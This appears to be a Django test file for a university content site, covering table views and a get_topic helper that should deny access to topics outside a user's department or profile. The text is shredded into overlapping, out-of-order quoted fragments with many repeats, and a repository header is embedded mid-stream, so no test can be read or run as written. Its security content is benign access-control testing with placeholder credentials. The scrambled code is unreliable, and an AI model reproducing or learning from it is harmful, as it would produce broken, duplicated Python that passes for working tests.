get_topic(request, self.dep.id, outsider_topic.id) flag", "faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): #", "self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise test another_dep", "password='<PASSWORD>' ) url = reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") #", "get_topic(request, another_dep.id, self.topic.id) flag = False except Http404: flag =", "self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): # Setup test url", "= Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self): #", "Department.objects.create() try: response = get_topic(request, another_dep.id, self.topic.id) flag = False", "email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile =", "request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): # Setup test url =", "Exercise test request = self.client.post(url) # Assert test self.assertEqual(302, request.status_code)", "faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory() request = request.get(reverse('get_topic',", "Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): # Setup", "from cms.views import get_topic class AccessRestriction(TestCase): def setUp(self): self.user =", "test another_topic = Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep)", "Setup test user = User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url", "import TestCase, RequestFactory from django.http import HttpRequest, Http404 from django.contrib.auth.models", "resolve from django.urls import reverse from django.test import TestCase, RequestFactory", "def setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university')", "# Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup test another_topic", "= self.client.get(url) # Assert test self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def", "test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup test", "= Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic name', desc='ddddd',", "= Department.objects.create() try: response = get_topic(request, another_dep.id, self.topic.id) flag =", "User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url = reverse('web_dep_table') request =", "from unittest import skip from users.models import University, Faculty, Department,", "another_dep.id, self.topic.id) flag = False except Http404: flag = True", "self.client.post(url) # Assert test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): # Setup", "self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise test response", "= Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic =", "response = get_topic(request) flag = False except Http404: flag =", "desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request)", "desc=\"test test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory()", "= self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) #", "= User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test", "= self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def", "True # Assert test self.assertTrue(flag) class TableViews(TestCase): def setUp(self): self.user", "department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep) def", "another_dep = Department.objects.create() try: response = get_topic(request, another_dep.id, self.topic.id) flag", "request = self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html')", "password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)", "test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): # Setup test request =", "username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url = reverse('web_dep_table') request = self.client.login(username=\"test_username\",", "User from unittest import skip from users.models import University, Faculty,", "User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile", "except Http404: flag = True # Assert test self.assertTrue(flag) class", "self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): # Setup test url", "self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac =", "self.topic.id) flag = False except Http404: flag = True #", "test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request, self.dep.id,", "get_topic(request, self.dep.id, self.topic.id) # Assert test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self):", "password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) # Assert test", "self.dep.id, outsider_topic.id) flag = False except Http404: flag = True", "self.user # Exercise test outsider_topic = Topic.objects.create(name='ms', desc=\"test test test\",", "self.dep.id, self.topic.id) # Assert test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): #", "request = self.client.get(url) # Assert test self.assertEqual(302, request.status_code) class UserTableViews(TestCase):", "user = User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url = reverse('web_dep_table')", "RequestFactory from django.http import HttpRequest, Http404 from django.contrib.auth.models import User", "= User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise", "True # Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup test", "University, Faculty, Department, UserProfile from cms.models import Topic from cms.views", "self.user # Exercise test try: response = get_topic(request, self.dep.id, 990)", "test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): # Setup test", "# Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): #", "response = get_topic(request, self.dep.id, outsider_topic.id) flag = False except Http404:", "True # Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup test", "request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url)", "test_return_topic_that_does_not_exist(self): # Setup test request = RequestFactory() request = request.get(reverse('get_topic',", "Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): # Setup", "Setup test request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id,", "test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request) flag", "self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test", "'topic_id': self.topic.id})) request.user = self.user # Exercise test response =", "{} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request =", "faculty=self.fac) def test_page_load_on_get(self): # Setup test url = reverse('web_dep_table') request", "django.http import HttpRequest, Http404 from django.contrib.auth.models import User from unittest", "class UserTableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac", "= get_topic(request) flag = False except Http404: flag = True", "self.uni = University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test", "User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test", "# Exercise test request = self.client.get(url) # Assert test self.assertEqual(302,", "= Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup", "Exercise test outsider_topic = Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac, term=1)", "False except Http404: flag = True # Assert test self.assertTrue(flag)", "TestCase, RequestFactory from django.http import HttpRequest, Http404 from django.contrib.auth.models import", "self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise test try:", "= get_topic(request, another_dep.id, self.topic.id) flag = False except Http404: flag", "reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test request =", "def test_page_load_on_get(self): # Setup test url = reverse('web_dep_table') request =", "# Exercise test response = get_topic(request, self.dep.id, self.topic.id) # Assert", "request.user = self.user # Exercise test response = get_topic(request, self.dep.id,", "= True # Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup", "self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup test url", "name', desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup test url", "Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup test another_topic =", "test_get_topic_with_no_parameters(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test test test\",", "# Exercise test request = self.client.get(url) # Assert test self.assertEqual(200,", "test user = User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url =", "test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic) def", "import Topic from cms.views import get_topic class AccessRestriction(TestCase): def setUp(self):", "<reponame>Ibrahem3amer/bala7<filename>cms/tests/test_views.py from django.core.urlresolvers import resolve from django.urls import reverse from", "self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) # Assert", "self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self): # Setup test", "Setup test url = reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") #", "url = reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test", ") url = reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise", "= University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test dep')", "response = get_topic(request, self.dep.id, 990) flag = False except Http404:", "= User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url = reverse('web_dep_table') request", "Assert test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): # Setup test request", "self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup test request = RequestFactory()", "term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request) flag = False except", "= self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url) #", "unittest import skip from users.models import University, Faculty, Department, UserProfile", "def test_page_redirect_on_no_profile(self): # Setup test user = User.objects.create_user( username='test_username', email='<EMAIL>',", "# Setup test url = reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>',", "= self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) #", "test response = get_topic(request, self.dep.id, self.topic.id) # Assert test self.assertEqual(200,", "'tables/table_main.html') def test_page_redirect_on_post(self): # Setup test url = reverse('web_dep_table') request", "'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup test url = reverse('web_user_table') another_user", "'topic_id': self.topic.id})) request.user = self.user # Exercise test try: response", "import get_topic class AccessRestriction(TestCase): def setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>',", "Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup", "# Exercise test request = self.client.post(url, data=data) # Assert test", "request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup test url =", "= False except Http404: flag = True # Assert test", "Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup test request =", "flag = True # Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): #", "Setup test another_topic = Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac, term=1)", "flag = True # Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): #", "self.assertTrue(flag) class TableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>')", "User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty')", "term=1) self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup", "outsider_topic = Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try:", "test another_dep = Department.objects.create() try: response = get_topic(request, another_dep.id, self.topic.id)", "test_post_when_no_choices(self): # Setup test url = reverse('web_user_table') data = {}", "try: response = get_topic(request, another_dep.id, self.topic.id) flag = False except", "try: response = get_topic(request, self.dep.id, outsider_topic.id) flag = False except", "University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test dep') self.profile", "users.models import University, Faculty, Department, UserProfile from cms.models import Topic", "test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory() request", "Topic from cms.views import get_topic class AccessRestriction(TestCase): def setUp(self): self.user", "test_page_load_on_get(self): # Setup test url = reverse('web_dep_table') request = self.client.login(username=\"ssss\",", "self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) # Assert", "self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep =", "self.dep = Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic", "= UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test test test\",", "from django.contrib.auth.models import User from unittest import skip from users.models", "self.dep.id, 990) flag = False except Http404: flag = True", "= RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id})) request.user", "test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self):", "email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep,", "= Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni,", "get_topic(request) flag = False except Http404: flag = True #", "= self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url, data=data)", "= self.user # Exercise test another_dep = Department.objects.create() try: response", "password=\"<PASSWORD>\") # Exercise test request = self.client.post(url, data=data) # Assert", "= reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request", "desc=\"test test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic)", "self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) # Assert", "= reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test request", "Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response =", "test url = reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise", "self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): # Setup test url = reverse('web_user_table')", "test_return_topic_that_has_different_department(self): # Setup test request = RequestFactory() request = request.get(reverse('get_topic',", "= True # Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup", "self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup test request = RequestFactory() request", "reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request =", "url = reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request =", "faculty=self.fac) self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self):", "email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request", "test_page_load_if_no_profile(self): # Setup test url = reverse('web_user_table') another_user = User.objects.create_user(username='xxxss',", "= Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)", "Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile = self.profile", "Assert test self.assertTrue(flag) class TableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss',", "self.user.profile.topics.add(another_topic) request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id':", "self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup test url = reverse('web_user_table') request", "test try: response = get_topic(request, self.dep.id, 990) flag = False", "test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): # Setup test user =", "= self.user # Exercise test outsider_topic = Topic.objects.create(name='ms', desc=\"test test", "desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request,", "request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id})) request.user = self.user", "# Exercise test request = self.client.post(url) # Assert test self.assertEqual(302,", "test url = reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request", "import reverse from django.test import TestCase, RequestFactory from django.http import", "test request = self.client.post(url) # Assert test self.assertEqual(302, request.status_code) def", "Exercise test request = self.client.post(url, data=data) # Assert test self.assertEqual(302,", "Exercise test another_dep = Department.objects.create() try: response = get_topic(request, another_dep.id,", "self.topic.id})) request.user = self.user # Exercise test try: response =", "Faculty, Department, UserProfile from cms.models import Topic from cms.views import", "from django.urls import reverse from django.test import TestCase, RequestFactory from", "= True # Assert test self.assertTrue(flag) class TableViews(TestCase): def setUp(self):", "test url = reverse('web_user_table') data = {} request = self.client.login(username=\"xxxss\",", "= {} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request", "from django.test import TestCase, RequestFactory from django.http import HttpRequest, Http404", "self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test test", "def test_page_load_on_get(self): # Setup test url = reverse('web_user_table') request =", "# Setup test url = reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\")", "request.user = self.user # Exercise test outsider_topic = Topic.objects.create(name='ms', desc=\"test", "test self.assertTrue(flag) class TableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>',", "request = self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html')", "Http404 from django.contrib.auth.models import User from unittest import skip from", "# Assert test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): # Setup test", "test url = reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise", "= Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic =", "= get_topic(request, self.dep.id, outsider_topic.id) flag = False except Http404: flag", "test_page_load_on_get(self): # Setup test url = reverse('web_user_table') request = self.client.login(username=\"ssss\",", "= Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request", "request.user = self.user # Exercise test another_dep = Department.objects.create() try:", "request = self.client.post(url) # Assert test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self):", "cms.views import get_topic class AccessRestriction(TestCase): def setUp(self): self.user = User.objects.create(username='test_username',", "flag = True # Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): #", "Setup test url = reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>')", "reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\")", "response = get_topic(request, another_dep.id, self.topic.id) flag = False except Http404:", "def test_get_topic_with_no_parameters(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test test", "Http404: flag = True # Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self):", "self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self):", "UserTableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac =", "Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs',", "flag = False except Http404: flag = True # Assert", "test_page_redirect_on_no_profile(self): # Setup test user = User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>'", "self.dep = Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self):", "# Setup test url = reverse('web_user_table') data = {} request", "test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup test another_topic = Topic.objects.create(name='is',", "request.user = self.user # Exercise test try: response = get_topic(request,", "AccessRestriction(TestCase): def setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni =", "self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise test outsider_topic", "import resolve from django.urls import reverse from django.test import TestCase,", "= get_topic(request, self.dep.id, 990) flag = False except Http404: flag", "desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup test url =", "# Assert test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): # Setup test", "test self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss',", "import skip from users.models import University, Faculty, Department, UserProfile from", "flag = True # Assert test self.assertTrue(flag) class TableViews(TestCase): def", "request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url)", "test request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id':", "True # Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup test", "from cms.models import Topic from cms.views import get_topic class AccessRestriction(TestCase):", "def test_page_redirect_on_post(self): # Setup test url = reverse('web_dep_table') request =", "term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request, self.dep.id, outsider_topic.id) flag =", "password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request =", "# Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): #", "'tables/user_table.html') def test_post_when_no_choices(self): # Setup test url = reverse('web_user_table') data", "Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def", "self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep,", "UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self): # Setup test url =", "# Assert test self.assertTrue(flag) class TableViews(TestCase): def setUp(self): self.user =", "self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic", "test outsider_topic = Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep)", "request.status_code) def test_page_redirect_on_no_profile(self): # Setup test user = User.objects.create_user( username='test_username',", "self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url) # Assert", "faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request) flag = False", "request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): # Setup test url =", "Department, UserProfile from cms.models import Topic from cms.views import get_topic", "# Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup test another_topic", "reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request =", "= Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile =", "HttpRequest, Http404 from django.contrib.auth.models import User from unittest import skip", "# Exercise test another_dep = Department.objects.create() try: response = get_topic(request,", "= self.client.post(url) # Assert test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): #", "import HttpRequest, Http404 from django.contrib.auth.models import User from unittest import", "django.core.urlresolvers import resolve from django.urls import reverse from django.test import", "term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup test url = reverse('web_user_table')", "def test_return_topic_that_outside_user_topics(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test test", "outsider_topic.department.add(self.dep) try: response = get_topic(request, self.dep.id, outsider_topic.id) flag = False", "UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep)", "self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self):", "self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test", "= self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def", "Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac,", "= request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id})) request.user = self.user #", "Exercise test request = self.client.get(url) # Assert test self.assertEqual(200, request.status_code)", "def test_page_load_if_no_profile(self): # Setup test url = reverse('web_user_table') another_user =", "class TableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac", "= get_topic(request, self.dep.id, self.topic.id) # Assert test self.assertEqual(200, response.status_code) def", "# Setup test url = reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\")", "get_topic class AccessRestriction(TestCase): def setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>')", "password=\"<PASSWORD>\") # Exercise test request = self.client.post(url) # Assert test", "def test_return_topic_that_match_user(self): # Setup test request = RequestFactory() request =", "try: response = get_topic(request, self.dep.id, 990) flag = False except", "department=self.dep, faculty=self.fac) def test_page_load_on_get(self): # Setup test url = reverse('web_dep_table')", "django.test import TestCase, RequestFactory from django.http import HttpRequest, Http404 from", "= self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup test request =", "test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup test request = RequestFactory()", "try: response = get_topic(request) flag = False except Http404: flag", "# Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): #", "test_page_redirect_on_post(self): # Setup test url = reverse('web_dep_table') request = self.client.login(username=\"ssss\",", "Assert test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): # Setup test user", "faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac, term=1)", "Exercise test try: response = get_topic(request, self.dep.id, 990) flag =", "# Exercise test outsider_topic = Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac,", "response = get_topic(request, self.dep.id, self.topic.id) # Assert test self.assertEqual(200, response.status_code)", "self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): # Setup test url = reverse('web_dep_table')", "'topic_id': self.topic.id})) request.user = self.user # Exercise test another_dep =", "request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url)", "setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep", "request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise", "test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup test another_topic = Topic.objects.create(name='is',", "Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self): # Setup", "self.topic = Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile", "self.user # Exercise test another_dep = Department.objects.create() try: response =", "from users.models import University, Faculty, Department, UserProfile from cms.models import", "kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise test", "self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>',", "test request = self.client.get(url) # Assert test self.assertEqual(302, request.status_code) class", "request = RequestFactory() request = request.get(reverse('get_topic', 